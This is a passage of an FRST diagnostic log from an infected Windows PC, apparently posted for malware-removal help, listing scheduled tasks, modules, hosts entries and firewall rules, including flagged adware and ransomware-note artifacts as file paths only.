ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()
Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]
Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]
Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)
Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)
Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)
Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)
Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()
Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)
Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho
 
ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll
2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe
2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe
2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll
2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll
2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com
IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => "avgnt"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886
FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886
FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869
FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900
FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
